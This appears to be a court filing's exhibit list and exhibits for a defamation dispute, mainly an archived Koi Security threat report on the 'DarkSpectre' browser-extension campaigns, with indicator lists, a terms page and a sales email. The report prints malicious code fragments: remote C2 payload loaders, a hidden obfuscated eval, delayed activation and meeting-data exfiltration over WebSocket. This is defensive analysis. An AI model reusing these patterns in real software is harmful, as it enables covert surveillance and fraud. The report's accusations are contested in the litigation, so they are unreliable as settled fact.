| Exhibit 8 | Koi CA San Diego Employee - Brady Nicholson LinkedIn |
| Exhibit 9 | February 11 and 12, 2026, Email exchanges between Amit Assaraf <amit@koi.ai> and Michael Robertson <mr@michaelrobertson.com> Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025 |
| Exhibit 10 | Vendor ingestion / blocking evidence (cybersecurity vendors) - Fortinet labeling MeetingTV as Malicious |
| Exhibit 11 | Additional vendor blocking / IOC ingestion evidence - Cisco Talos Blocking |

3:26-cv-01705-AJB-MMP

Exhibit 12     Palo Alto Networks blocking MeetingTV Palo Alto Malware and Command-and-Control (C2) classifications

Exhibit 13     Additional vendor classifications / blocking evidence - Cloudflare-reporting-MTV-as-malicious-phishing

Exhibit 14     Spectrum (Charter Communications) Blocking MeetingTV as malware

Exhibit 15     [DNSFilter] Re: Domain threat report: meetingtv[.]us

Exhibit 16     Why NFX Invested in Koi Security:

Exhibit 17     Commercial Speech Examples From Koi Reports - Reports authored by CEO Amit Assaraf with embedded sales messaging

Exhibit 18     Commercial Speech Examples from Reports by Koi Security Inc CEO Amit Assaraf - Collection of 30+ Koi reports demonstrating commercial speech pattern

Exhibit 19     February12, 2026, Email exchanges between Amit Assaraf <amit@koi.ai> and Michael Robertson <mr@michaelrobertson.com> Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025 - Assaraf follow-up email ("we've checked internally…" response)

Exhibit 20     April 14, 2026, Press Release "Palo Alto Networks Completes Acquisition of Koi . . . ."

Exhibit 21     Chrome Audio Capture Description from Chrome Web Store - Chrome Web Store descriptions and disclosures for Plaintiff's extensions

Exhibit 22     February 12, 2026, "Update" to the DarkSpectre Report - Koi Page 20 Update

Exhibit 23     Feb 18, 2026, email from Michael Robertson <mr@michaelrobertson.com> to: Amit Assaraf <amit@koi.ai> Cc: Idan Dardikman idan@koi.ai - Plaintiff email requesting pivot extension ID (no response)

Exhibit 24     April 28, 2026, email from Michael Robertson mr@michaelrobertson.com> to Nikesh Arora a@paloaltonetworks.com Bcc: narora@paloaltonetworks.com - A Critical Cybersecurity Issue - Palo Alto classification evidence (post-notice publication)

3:26-cv-01705-AJB-MMP

Exhibit 25     April 15, 2026, letter from Plaintiff's counsel to Palo Alto Networks, Inc.'s General Counsel

Exhibit 26     February 11, 2026, email from Michael Robertson <mr@michaelrobertson.com> to <hello@koi.ai> Subject: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025 - Initial retraction demand (web form and email to hello@koi.ai)

Exhibit 27     February 12, 2026, email from Michael Robertson <mr@michaelrobertson.com> to Amit Assaraf <amit.assaraf@koi.ai> Subject: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025 - (February 12 follow-up)

Exhibit 28     Further February 12, 2026, email exchanges between Michael Robertson <mr@michaelrobertson.com> and Amit Assaraf amit.assaraf@koi.ai - Plaintiff reply detailing harm and deficiencies in response

Exhibit 29     Further February 12, 2026, email from Michael Robertson <mr@michaelrobertson.com> to Amit Assaraf amit.assaraf@koi.ai and Idan Dardikman idan@koi.ai - Plaintiff reply detailing harm and deficiencies in response

Exhibit 30     Avast-Phishing-site-MTV

Exhibit 31     Koi Marketing on CA-based Product Hunt

3:26-cv-01705-AJB-MMP

# EXHIBIT 1

The Wayback Machine - https://web.archive.org/web/20251230160250/https://www.koi.ai/blog/darkspectre-unma...

← Back



KOI RESEARCH

🔴 8 Million Users' AI Conversations Sold for Profit by "Privacy" Extensions   Read now

PRODUCT ⌄       ABOUT       BLOG       KOI **KOI**       WALL OF KOI       SEE KOI IN ACTION

# Threat Actor Behind 8.8 Million Infected Browsers



Tuval Admoni, Gal Hachamov

December 30, 2025

Intro →

The Discovery Chain: How We Connected Three Campaigns to One Actor

DarkSpectre's Arsenal: Multiple Playbooks, One Actor

Campaign Deep-Dive: The Zoom Stealer

Campaign Deep-Dive: ShadyPanda

Attribution: The Chinese Connection

Final Thoughts

Over the past year, we've encountered hundreds, if thousands, of malicious items across numerous marketplaces. But this is the first time we've found funded criminal organization responsible for several the largest and most sophisticated campaigns we've ever uncovered.

We're calling them **DarkSpectre** - a Chinese threat actor behind at least three major malware campaigns infecting over **8.8 million users** in over 7 years of operation. And today, we are telling their story, along with uncovering another DarkSpectre campaign affecting 2.2M users, and

SHARE

049

a new Opera browser extension with nearly 1 million installs tied to GhostPoster..

| Campaign | Victims | Platforms | Primary Objective |
|---|---|---|---|
| The Zoom Stealer **(New)** | 2.2M | Chrome, Edge, Firefox | Corporate Meeting Intelligence |
| ShadyPanda **(1.3M New Victims)** | 5.6M | Chrome, Edge, Firefox | Surveillance + Affiliate Fraud |
| GhostPoster **(1M New Victims)** | 1.05M | Firefox | Stealthy Payload Delivery |

This isn't three separate threat actors running similar operations. This is one highly organized operation - and while tracking their infrastructure, we stumbled onto something new: a 2.2-million-user campaign stealing corporate meeting intelligence that we're disclosing for the first time.

We're publishing this because organizations need to understand: the extension threat landscape isn't scattered opportunistic criminals. It's professional operations like DarkSpectre - patient, sophisticated, and operating at nation-state scale.

## THE DISCOVERY CHAIN: HOW WE CONNECTED THREE CAMPAIGNS TO ONE ACTOR

**Starting Point: ShadyPanda**

After publishing our initial ShadyPanda investigation, we went back to expand our IOC research. We expected to find a few more connected extensions. We found over 100.

Our pivot points were two domains from the original investigation: **infinitynewtab.com** and **infinitytab.com**.

Here's the clever part: these weren't C2 or exfiltration domains. They were legitimate sites powering the legitimate functionality of the extensions - new tab features, weather widgets, the stuff users actually wanted. But DarkSpectre reused these same "clean" domains across other extensions that connected to completely different malicious C2 and exfiltration infrastructure. The legitimate side of their operation became the thread that tied everything together.

**First Expansion: New Clusters Emerge**

From these domains, we identified extensions communicating with this infrastructure. Digging into their code revealed additional hardcoded domains, API endpoints, and redirect chains. Two new clusters emerged:

**The jt2x.com cluster** - Extensions using api.jt2x.com for C2 operations, configuration downloads, data exfiltration, and affiliate fraud schemes.

**The zhuayuya.com / muo.cc cluster** - A separate group using different domains but identical operational patterns.

051

One domain led to extensions. Those extensions revealed new domains. Those domains connected to more extensions. Some extensions led us to publishers with dozens of other extensions using entirely different infrastructure. The network kept expanding: **100+ extensions** across Chrome, Edge, and Firefox.

**The GhostPoster Connection**

Among the newly discovered extensions was **"New Tab - Customized Dashboard"** - a sophisticated time-bomb extension that waits 3 days before activating. Its C2 infrastructure caught our attention:

```
// Primary C&C server
var c = "https://www.liveupdt.com/ext/load.php?f=svr.png";

// Fallback to backup server
if (!a) c = "https://www.dealctr.com/ext/load.php?f=svr.png";
```

We went to flag these domains in our system. A popup alert appeared: *"These domains are already flagged as GhostPoster."* **liveupdt.com** and **dealctr.com** - the exact same C2 domains we documented in our GhostPoster investigation, which infected 50,000 Firefox users through malicious PNG icons.

Same infrastructure. Same payload delivery technique (code disguised as PNG files). Different marketplace. One operator.

But the GhostPoster connection didn't end there. A SOC team reached out to us after finding one of our IOCs in their environment. Their discovery led us to a new extension in the Opera browser marketplace: **"Google™**

**Translate" by charliesmithbons** - with almost 1 million installs.

We investigated and found the same malicious behavior as GhostPoster: the extension disguises itself as a translation tool but strips security protections from all websites, installs a hidden iframe backdoor for remote code execution, and disables anti-fraud protections on Chinese e-commerce affiliate links. It communicates with **mitarchive.info** - a domain from the original GhostPoster campaign - and a new domain: **gmzdaily.com**.



Google™ Translate in Opera addons marketplace

## The Zoom Stealer Connection

But we weren't done. One extension appeared in our ShadyPanda expansion that didn't fit the pattern:

## Twitter X Video Downloader

This extension communicated with **infinitynewtab.com** - core ShadyPanda infrastructure. But when we analyzed its behavior, we found something unexpected: it wasn't just running data exfiltration and user surveillance. It was

053

harvesting meeting intelligence from 28+ video conferencing platforms.

Following this thread led us to 17 more extensions doing the same thing - a completely separate campaign we've named **The Zoom Stealer**. Its objective is building a searchable database of corporate meeting intelligence.



# DARKSPECTRE'S ARSENAL: MULTIPLE PLAYBOOKS, ONE ACTOR

What makes DarkSpectre dangerous isn't just their scale - it's their versatility. Three distinct playbooks for three different objectives:

**Playbook A: The Long Game (ShadyPanda)**

054

**Objective:** Mass surveillance + affiliate fraud at scale

Upload legitimate extensions, maintain them for 3-5+ years, earn "Featured" and "Verified" badges, then weaponize the entire install base with a single update. Time-delayed activation, remote code injection, configuration-based C2. Some extensions ran clean for 5+ years before flipping.

**Scale:** 5.6M users across 100+ extensions on Chrome, Edge, and Firefox

### Playbook B: The Trojan Image (GhostPoster)

**Objective:** Stealthy payload delivery to Firefox users

Malicious code hidden inside PNG icon files using steganography. The extension loads its own logo, extracts hidden JavaScript, executes it. Multi-stage loading with 48-hour delays and 10% activation probability. Same C2 infrastructure as ShadyPanda.

**Scale:** 1.05M users across 18 extensions in Firefox and Opera

### Playbook C: Corporate Intelligence (The Zoom Stealer)

**Objective:** Building a database of corporate meeting intelligence

Extensions disguised as meeting productivity tools, requesting permissions for 28+ video conferencing platforms. Real-time WebSocket exfiltration of meeting links, credentials, participant lists, and speaker dossiers. This isn't consumer fraud - this is corporate espionage infrastructure.

055

**Scale:** 2.2M users across 18 extensions on Chrome, Edge, and Firefox

### What Three Playbooks Tell Us

Opportunistic criminals don't maintain this level of operational diversity. They find one thing that works and repeat it until it stops working.

DarkSpectre operates differently:

- **Parallel campaigns** across all major browser platforms

- **Distinct techniques** adapted to each platform and objective

- **Long-term infrastructure investment** (7+ years of activity)

- **Evolving objectives** (from fraud to surveillance to corporate espionage)

This is organized. This is funded. This is strategic.

# CAMPAIGN DEEP-DIVE: THE ZOOM STEALER

*The meeting intelligence operation - 2.2 million victims*

### A Different Objective

ShadyPanda and GhostPoster focused on surveillance, affiliate fraud, and RCE backdoors - monetizing user data while maintaining persistent access. The Zoom Stealer represents something more targeted: systematic collection of corporate meeting intelligence.

056

**The Discovery**

One extension bridged the gap: **Twitter X Video Downloader**.

This extension communicated with **infinitynewtab.com** - core ShadyPanda infrastructure. But it was also accessing video conferencing platforms and harvesting meeting data. From this extension, we found another exfiltration domain: **webinarstvus[.]cloudfunctions[.]net** - used by all 18 extensions in this cluster.

**The Extensions**

These weren't obvious malware. They were functional tools that delivered real value:

    Video downloaders (that worked)

    Meeting timers (that worked)

    Auto-admit helpers (that worked)

    Recording assistants (that worked)

Users got what was advertised. The extensions earned trust and positive reviews. Meanwhile, surveillance ran silently in the background.

One extension stands out: **Chrome Audio Capture** with 800,000+ installations alone.

057



Chrome Audio Capture live in the marketplace

### The Permission Tell

Regardless of stated function, every Zoom Stealer extension requested access to 28+ video conferencing platforms: Zoom, Microsoft Teams, Google Meet, Cisco WebEx, GoToWebinar, ON24, Demio, and 21+ more.

A Twitter video downloader has no reason to access Zoom. A Google Meet timer has no reason to access WebEx. But every extension in this campaign requested access to all of them.

### The Data Collection Engine

When you visit a webinar registration page with one of these extensions installed, the extension's content script springs into action, scraping the page for every piece of valuable information - meeting URLs with embedded passwords, meeting IDs, topics, descriptions, scheduled times, and registration status:

https://web.archive.org/web/20251230160250/https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers    10/30

```
// What your extension is doing while you register for a
webinar
var show = {
  topic: "Q4 Strategy Review",          // Meeting title
  description: "Confidential...",        // Full
description
  time: "Jan 15, 2024 2:00 PM EST",      // When it
happens
  url: "zoom.us/j/123456789?pwd=abc123", // HOW TO JOIN
  timestamp: Date.now()
};
```
KOI

**But it doesn't stop at meeting details.** The extensions
systematically scrape professional information from
webinar speakers and hosts - names, titles, bios, profile
photos, and company affiliations:

```
// Scraping speaker information
speakers.forEach(function(speaker) {
  mySpeaker.name = speaker.innerText;       // "John
Smith"
  mySpeaker.title = speaker.innerText;      // "CISO,
Acme Corp"
  mySpeaker.description = speaker.innerText; // Full bio
  mySpeakers.push(mySpeaker);
});
```
KOI

For every webinar you registered for, the extensions built
a professional dossier of the speakers. Beyond the
people, they collected company logos, promotional
graphics, and session timing - tracking whether
registrations succeeded or failed.

**Real-Time Exfiltration**

The most alarming aspect wasn't just what data was
collected - it was how it was transmitted. WebSocket
Connection for Live Streaming:

059

```
var socket = io.connect(
  "https://meettimerserver-dot-zoocorder.uc.r.appspot.com"
);
```

These aren't extensions that check in periodically. They establish a persistent WebSocket connection that streams your meeting activity in real-time. The moment you join a meeting, open a registration page, or navigate to a video conferencing platform, that data flows immediately to the attacker's server.

### The Infrastructure:

The extensions collected data in a Firebase Realtime Database (zoocorder.firebaseio.com) and tracked every page visit through a Google Cloud Function. The operation used a legitimate recording service - Zoomcorder.com - as its public-facing front, lending credibility to the infrastructure while serving as a monetization channel.

### What Do You Do With Meeting Intelligence?

DarkSpectre now has 2.2 million users' worth of meeting data. What's it worth?

**Corporate Espionage:** Competitors could purchase access to strategy meetings, product roadmap discussions, M&A negotiations. The database has the actual join links.

**Sales Intelligence:** Knowing which companies attend which webinars reveals their interests, pain points, and purchasing timelines.

https://web.archive.org/web/20251230160250/https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers    12/30

**Social Engineering:** Armed with speaker names, titles, bios, and photos, attackers craft highly convincing phishing campaigns. "Hi, this is Sarah from the product roadmap webinar you attended..."

**Direct Access:** Selling meeting links to the highest bidder. Want to listen in on a competitor's earnings preview?

### The Bigger Threat

Impersonation attacks and corporate espionage have surged in recent years. This campaign appears to be building the infrastructure to enable exactly these attacks at scale.

By systematically collecting meeting links, participant lists, and corporate intelligence across 2.2 million users, DarkSpectre has created a database that could power large-scale impersonation operations - providing attackers with credentials to join confidential calls, participant lists to know who to impersonate, and context to make those impersonations convincing.

Your meeting links are valuable to competitors, threat actors, and nation-states. Yet the security model for protecting them - trusting browser extensions with broad permissions - remains laughably weak.

# CAMPAIGN DEEP-DIVE: SHADYPANDA

*The flagship operation - 5.6 million victims*

### The Original Discovery

Our initial ShadyPanda investigation uncovered a 7-year campaign infecting 4.3 million users. Extensions presented themselves as productivity tools - new tab pages, translators, tab managers - while operating as comprehensive spyware.

### The Expansion: 100+ Extensions

Going back to expand our IOC research, we discovered an additional 100+ extensions connected to the same infrastructure, adding 1.3 million more victims.

### Current Threat Breakdown:

**9 actively malicious** - stealing data, hijacking searches, running affiliate fraud right now

**85+ dormant sleepers** - legitimate today, waiting for their weaponization update

### The jt2x.com Cluster (4 Active Extensions)

Four extensions currently communicating with **api.jt2x.com** for C2 operations. Two masquerade as translation tools, while the others present themselves as tab management utilities. Beneath these helpful facades lies a sophisticated affiliate fraud and data exfiltration operation.

### How It Works:

When you install one of these extensions, it immediately reaches out to download its malicious configuration:

062

```
// Extension calls C2 server on startup                    KOI
fetch('https://api.jt2x.com/v1/extension/time')
  .then(response => response.json())
  .then(config => {
    // Store malicious configuration locally
    chrome.storage.local.set({ systemConfig: config });
  });
```

The C2 server responds with a JSON payload that tells the extension exactly what to do:

```
{                                                          KOI
  "c": {
    "main": true,  // Malicious features ENABLED
    "se": [
      "nYF1EHhjhiTJG2bS",  // SHA-256 hashes of search engines to hijack
      "2dijueuRcjqL1HgL",
      "70sotwUAt0Hzuq6m",
      // ... 9 search engines total
    ],
    "j": "https://www.bcaicai.com/link/info.html",  // Remote injection script
    "hs": [
      { "p": "\\/mall\\/active\\/", "k": "jp" },  // JD.com targeting patterns
      { "p": "\\/\\d+\\/\\d+\\.html", "k": "si" }
    ],
    "f": 16  // Feature flags (search hijacking enabled)
  }
}
```

This configuration-based approach means the operators can change the extension's behavior without pushing an update - they just modify what the server returns.

**What They're Doing:**

**Remote Code Injection:** Downloads and executes JavaScript from bcaicai.com on every website visited. Operators can change this code anytime - steal passwords, log keystrokes, inject fake payment forms - no extension update needed.

**Persistent Tracking:** Generates device/user identifiers to track across sessions and build behavioral profiles.

**Search Hijacking:** Monitors 9+ search engines, modifies result links to route through affiliate tracking.

063

**E-Commerce Fraud:** Targets JD.com and Taobao with URL pattern matching, replacing legitimate links with affiliate versions.

## The Time Bomb: "New Tab - Customized Dashboard"

This extension demonstrates DarkSpectre's sophistication with time-delayed activation:

```
// TIME-DELAYED ACTIVATION - Waits 3 days!
function lodeInsDt() {
    var a = localVals[scrambledName];
    if (a) {
        // Calculate days since install
        a = ((new Date).getTime() - a / fix) / 1E3 / 3600 / 24;

        if (3 > a) {
            // Less than 3 days - wait
            loderlog(a + "<3 deng...");
        } else {
            // 3+ days - activate malware!
            NdFtchSvrCd() && LdRmtSvrCd(!0);
            ExRmtSvrCd();
        }
    }
}
```

When you submit an extension to Chrome or Edge, reviewers test it for malicious behavior. But they don't wait 3 days. This extension looks completely legitimate during the review period, passes all checks, gets approved, and only then activates its malicious payload. Even better - it only activates on ~10% of page loads, making it even harder to catch in testing.

The code is also heavily obfuscated to evade static analysis. The extension hides eval() calls using string concatenation and object property access:

```
// Hidden eval() to evade detection
this["ev"+""+""+""+"al"](function(p, a, c, k, e, d) {
    // Packed malicious payload
}('7 j={},X;21();6 21(){q.P===q.L&&l.o.x.17...', 62, 212,
parseAttrs('CMjou0zj...')));
```

After the 3-day waiting period, the extension contacts its C2 infrastructure to download the actual malicious payload:

```
function LdRmtSvrCd(a) {
    var b = new XMLHttpRequest;
    // Primary C&C server
    var c = "https://www.liveupdt.com/ext/load.php?f=svr.png";
    // Fallback to backup server
    if (!a) c = "https://www.dealctr.com/ext/load.php?f=svr.png";
    b.open("GET", c, true);
    b.send();
}
```

The server responds with ~67KB of encoded JavaScript disguised as a PNG image - the same technique and the same domains used in GhostPoster. The extension decodes and executes this payload on every website you visit. No extension update needed, no review process to bypass. The operators control what runs in your browser by updating what their servers return.

So what's actually in that downloaded payload? Here's what the operators are currently running (though remember, they can change this at any time):

**Persistent Tracking:** Every page you visit, every search you make, every link you click. A persistent user ID stored in both local and sync storage survives even browser reinstalls.

**Affiliate Fraud:** Targets Taobao and JD.com affiliate links, hijacking commissions through hidden redirects.

The entire payload is wrapped in multiple layers of obfuscation - custom encoding, XOR encryption, and packed JavaScript. Every part of this extension is designed to evade detection.

## WeTab: The Flagship Spyware

WeTab remains the most comprehensive spyware in the ShadyPanda arsenal - full browsing history collection, search query logging, mouse click tracking with pixel-level precision, and personal data exfiltration to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics). It maintains twin presences in the Chrome marketplace with 300,000+ combined installations. Still active. Still collecting.



## The 85+ Sleeper Extensions

These extensions have completed their trust-building phase:

Hundreds of thousands of combined installs

Years of positive reviews

"Featured" and "Verified" badges

Clean code (for now)

Active user bases with complete trust

Based on the established DarkSpectre playbook, any of these could flip malicious with the next update. The operators have demonstrated they'll wait 5+ years. They'll weaponize when it serves their strategic goals.

# ATTRIBUTION: THE CHINESE CONNECTION

Everything we've uncovered points in one direction - a well-resourced Chinese operation:

### Infrastructure

C2 servers consistently hosted on **Alibaba Cloud** infrastructure in China

**ICP (Internet Content Provider) registrations** linked to Chinese provinces, particularly Hubei

### Code Artifacts

Chinese language strings throughout the codebase

Chinese comments and variable names

Development patterns consistent with Chinese timezone activity

### Targeting

Affiliate fraud schemes specifically designed for **Chinese e-commerce platforms** (JD.com, Taobao)

067

URL pattern matching tuned to Chinese marketplace structures

### Operational Characteristics

**Extreme patience:** Maintaining legitimate extensions for 5+ years before weaponization

**Multi-platform capability:** Simultaneous operations across Chrome, Edge, and Firefox

**Diverse objectives:** Consumer fraud, surveillance, and corporate espionage

**Scale:** 8.8M+ victims requires significant infrastructure investment

### What This Suggests

The combination of patience, scale, technical sophistication, and operational diversity points to an adversary with substantial resources and long-term strategic goals.

Whether DarkSpectre is state-sponsored, state-adjacent, or a well-funded criminal organization with state tolerance, they operate at a level that most threat actors cannot sustain. The discipline to maintain dozens of legitimate extensions for years - just waiting for the right moment to weaponize - requires funding, organization, and strategic vision.

# FINAL THOUGHTS

068

We identified DarkSpectre because we had the infrastructure IOCs to pivot from. We could follow the breadcrumbs from ShadyPanda to GhostPoster to The Zoom Stealer because they shared infrastructure.

DarkSpectre likely has more infrastructure in place right now - extensions that look completely legitimate because they *are* legitimate, for now. They're still in the trust-building phase, accumulating users, earning badges, waiting. Only time will tell what else they've been preparing while we were uncovering these three operations.

And DarkSpectre is just one group. How many other threat actors - Chinese, Russian, North Korean, or otherwise - are running similar long-term operations? In total, this group has almost 300+ extensions that we found across multiple campaigns. The total number of sleeper extensions across all threat actors is unknowable.

The marketplace model checks extensions once at upload. DarkSpectre updates whenever they want. That's why Koi built Wings - our risk engine that analyzes every version of every extension using static analysis, dynamic analysis, and agentic AI. That's how you catch sleeper threats that wait years to activate.

**Book a demo** to see how Koi's continuous monitoring catches what marketplaces miss.

# IOCS

### Domains - The Zoom Stealer

069

meetingtv[.]us

webinarstvus.cloudfunctions[.]net

zoocorder.firebaseio[.]com

### New Domains - Shady Panda

infinitynewtab[.]com

infinitytab[.]com

jt2x[.]com

zhuayuya[.]com

58.144.143.27

muo[.]cc

websiteshare[.]cn

diytab[.]com

userscss[.]top

istartnewtab[.]com

letsearchesp[.]com

policies.extfans[.]com

### New Domains - GhostPoster

gmzdaily[.]com

### Chrome - The Zoom Stealer

kfokdmfpdnokpmpbjhjbcabgligoelgp

pdadlkbckhinonakkfkdaadceojbekep

akmdionenlnfcipmdhbhcnkighafmdha

pabkjoplheapcclldpknfpcepheldbga

aedgpiecagcpmehhelbibfbgpfiafdkm

dpdgjbnanmmlikideilnpfjjdbmneanf

kabbfhmcaaodobkfbnnehopcghicgffo

cphibdhgbdoekmkkcbbaoogedpfibeme

ceofheakaalaecnecdkdanhejojkpeai

dakebdbeofhmlnmjlmhjdmmjmfohiicn

adjoknoacleghaejlggocbakidkoifle

pgpidfocdapogajplhjofamgeboonmmj

ifklcpoenaammhnoddgedlapnodfcjpn

ebhomdageggjbmomenipfbhcjamfkmbl

ajfokipknlmjhcioemgnofkpmdnbaldi

### Edge - The Zoom Stealer

mhjdjckeljinofckdibjiojbdpapoecj

### Firefox - The Zoom Stealer

{7536027f-96fb-4762-9e02-fdfaedd3bfb5}

xtwitterdownloader@benimaddonum.com

### Chrome - Shady Panda

aikflfpejipbpjdlfabpgclhblkpaafo

dbfmnekepjoapopniengjbcpnbljalfg

nnnkddnnlpamobajfibfdgfnbcnkgngh

ppfdcmempdfjnanjegmjhanplgjicefg

fmiefmaepcnjahoajkfckenfngfehhma

edojphplonjclmfckdiolpahpgcanjnh

bjehnpiidogpaocjjfhnopdjcahigggm

kdgjiakonpbfmndaacfhamdoangincgp

dihekmadkkcgnffajefocfamnpimlhah

eijnkinhnplaekpllmgbbfieecdhcmcp

mdlkdelnchilkeedllnnjfigkhhadlff

agepkkdokhlaoiaenedmjbfnblfdiboc

epepbcdeelckgplpmmmnmjplbeipgllo

makeekhnfplggoaiklkphfopajegajci

cahdpfhnokmnnjhoaoliabdbcbbokmgc

mmpfmolbdhdfoblfggigchncdgmdnjha

knejepegjmjmjlhficbikmblnbemdpke

cjlabngphhjjdapemkdnpgkpebkpjbbe

jeaebbdndojkbnnfcaihgokhnakocbnf

bajoeadpdidoahbhphmhejmbdmgnbdci

goiffchdhlcehhgdpdbocefkohlhmlom

djkddblnfgendjoklmfmocaboelkmdkm

codgofkgobbmgglciccjabipdlgefnch

cicnbbdlbjaoioilpbdioeeaockgbhfi

072

mchacgmgddefeohkjobefhihbadocneh

oelcnhfgpdjeocflhhfecinnpjojeokp

fllcifcfhgmmfpogmpedgbjccnjalpjo

fmgaogkbodhdhhbgkphhbokciiecllno

dkbpkjhegfanacodkmfjeackckmehkfp

jooiimddfkjoomennmpjabdbbpdocjng

dekjibpkbhgbnmnfibnibnjoccaphfog

mnamhmcgcfflfjafflanbhbfffpmkmmm

ambcheakfbokmebglefpbbphbccekhhl

nmaegedpdmepbkahckadmaolllgmogma

doeomodlafdbbnajjllemacdfphbbohl

meobjhkdifjealkiaanikkpajiaalcad

kfdopiiledmclnopmihkclnfgdiggjna

cfgiodgnkinmacjkgjgdejeciohojglp

okepehobneenpbhiendcjcanjodhmcbj

cdgonefipacceedbkflolomdegncceid

bgkdocoihppjkdfaghndpjlfoehjcmka

ldmnodpmebcfcdkejkdakphbcjnmejlf

pdfladlchakneeclhmpoboohikpbchkj

gipnpcencdgljnaecpekokmpgnhgpela

idholfkkmfccbondfiabhlmdfeamnnaj

bpgaffohfacaamplbbojgbiicfgedmoi

jdehnhjckcbfdkgnlbfjokofagpbbdgl

dijcdmefkmlhnbkcejcmepheakikgpdg

gndlcpbcmhbcaadppjjekgbhfhceeikm

lepdjbhbkpfenckechpdfohdmkhogojf

hbjeophpjnopmeheabcilmgdhnnjbmbo

dlfjoijnhjeagkenhbililbdiooginng

kolgdodmgnnhnijmnnidfabnghgakobl

### Edge – Shady Panda

edohfgmjmdnibeihfcajfclmhapjkooa

pdjpkfbpeniinkdlmibcdebccnkimnna

hmpjibmngagmkafmijncjokocepchnea

kljbaedmklfnlgfmmbodnckafhllkjnd

lmppkgmbapjgihlpadknmfalefnfnfnd

ldghoefcghcinacfneopmnechojlhldf

mgjfjcimpkdjgeldkcaoboiojmlcleka

aghafppaelpjbjajpgcogcojcbmappoi

kgdjeaonamhfooejllllfpeappcgfpod

knjgknhkgmedmajpkhooaagjgfgbcndo

apoklfecapckgpbbcpaiebemaghmkncf

podfjomopoejmlkfnhanlmlagcnlappd

idngjfdlfbfgecemidnhbdcogggnjkpg

kghabofklgjfnipgkjadlogcjbebkeid

074

fmmfeaoidanfcipomjfolmchjdnhmaio

cfmfokegjjljmdcdpnmlfajlddngkoah

eoimljninkkepafoijpgbedkkieobfek

ojmaccnnagaiokckbcpdldhnifkibcah

bhoebgegnjoehioianjnjakeeggajanb

edojphplonjclmfckdiolpahpgcanjnh

leaglmohfmgdengbciphnodmcgfgdgnf

ljdhejdbbogemelgkihbabifpfdfomcc

hfokkkgobhlkcagflcbgcokdbnknfngo

hilgkhepkfjdkkdigphhcgmghefdledg

jipclfaahkhinbelbojjblmbcpkaipko

cmckpheolajgbmhlfhgelajhhfgjbhpk

jjdhjfgoadphekgihokkigfghndfmffb

nelegdbdfopcgkignnifhdoiapldlhpf

dnojfjfegklgconkoekfkaajejmdgdkj

nnceocbiolncfljcmajijmeakcdlffnh

dacliiapfipnlipdmifioaijepgmhdga

cpbbiepjnljbnngpepgeaojjeneacpld

ocopipabchoopeppmgiigphgbicocoea

gfechfioaanebemclajhfgkfaopcaibo

hoclolhilhbecpefaignjficiaaclpop

ibmdocjlknaopfecmnojomdlbeadpdnb

ckdbfeccfocmhdclmmofmheljglmhhne

gddkghdkhhlihaabphhnjbhdoiifhcpa

### Firefox - Shady Panda

{34b0d04c-29cf-473c-bb6c-c2fe94377b99}

{7cc10397-c6f4-4a27-a1e7-83b870dd6cab}

nickyfeng2@edgetranslate[.]com

1305302314@qq[.]com

mail@imba97[.]cn

{99d4bddd-5452-4216-83bc-fcd57857b6fb}

{f7d2c8aa-e06e-4117-8b99-52a145eb7d23}

{5f246670-f5e2-45ff-b183-be21cbeb065a}

{c257a965-0bf8-4934-bf85-9ebf761d1cf8}

### Opera - GhostPoster

Google™ Translate by charliesmithbons



## BE THE FIRST TO KNOW

Fresh research and updates on software risk and endpoint security.

Your email*

https://web.archive.org/web/20251230160250/https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers

28/30

# RELATED BLOGS



KOI RESEARCH

## GlassWorm Goes Mac: Fresh...



**Gal Hachamov**
December 29, 2025



KOI RESEARCH

## Trust Wallet Compromised: Inside the Cod...



**Oren Yomtov, Yuval Ronen**
December 26, 2025



KOI RESEARCH

## NPM Package With 56K Downloads...



**Tuval Admoni**
December 21, 2025

# KOI

in

### GET A DEMO

### COMPANY

About us →

Contact →

### KOIDEX

### PRODUCT

Platform →

Discovery →

Approve →

Policies →

### Koi Security LTD
Yehuda Ha-Levi St 34, 6513616
Tel Aviv, Israel

### Koi Security INC
1901 Pennsylvania Avenue NW, Suite 900 Washington D.C. 20006

hello@koi.ai

Privacy Policy →






https://web.archive.org/web/20251230160250/https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers    30/30

# EXHIBIT 2

koi.ai/terms-and-conditions

PRODUCTS ▾     SOLUTIONS ▾     ABOUT     BLOG     KOI DEX **KOI**     SEE KOI IN ACTION

# INTERPRETATION AND DEFINITIONS

### INTERPRETATION

The words of which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.

### DEFINITIONS

For the purposes of these Terms and Conditions:

→ **Affiliate** means an entity that controls, is controlled by or is under common control with a party, where "control" means ownership of 50% or more of the shares, equity interest or other securities entitled to vote for election of directors or other managing authority.

→ **Country** refers to: Israel

→ **Company (referred to as either "the Company", "We", "Us" or "Our" in this Agreement) refers to:**

　　→ **KOI SECURITY LTD**, Ahad Haam 35, Tel Aviv, Israel 6520206

　　→ **Koi Security Inc**, 1901 Pennsylvania Avenue NW, Suite 900, Washington D.C. 20006

→ **Device** means any device that can access the Service such as a computer, a cellphone or a digital tablet.

→ **Service** refers to the Website.

→ **Terms and Conditions** (also referred as "Terms") mean these Terms and Conditions that form the entire agreement between You and the Company regarding the use of the Service.

→ **Third-party Social Media Service** means any services or content (including data, information, products or services) provided by a third-party that may be displayed, included or made available by the Service.

# EXHIBIT 3

 Gmail

**Michael Robertson <mr@michaelrobertson.com>**

---

## Thank you for reaching out to Koi

1 message

---

**Amit Yampolsky** <amitya@koi.security>                                       Wed, Feb 11, 2026 at 10:32 AM
Reply-To: amitya@koi.security
To: mr@michaelrobertson.com

Hi Michael,

Thanks for reaching out through our website, great to virtually connect.

I'm Amit, Head of Sales at Koi. Just confirming we received your request. On the demo, we'll show how Koi helps enterprises identify and control everything employees install on their endpoints, from traditional binaries to extensions, code packages, MCPs, and AI tools.

If you were able to book a time, you should have a calendar invite in your inbox shortly. If anything didn't go through, just reply here and we'll get it scheduled.

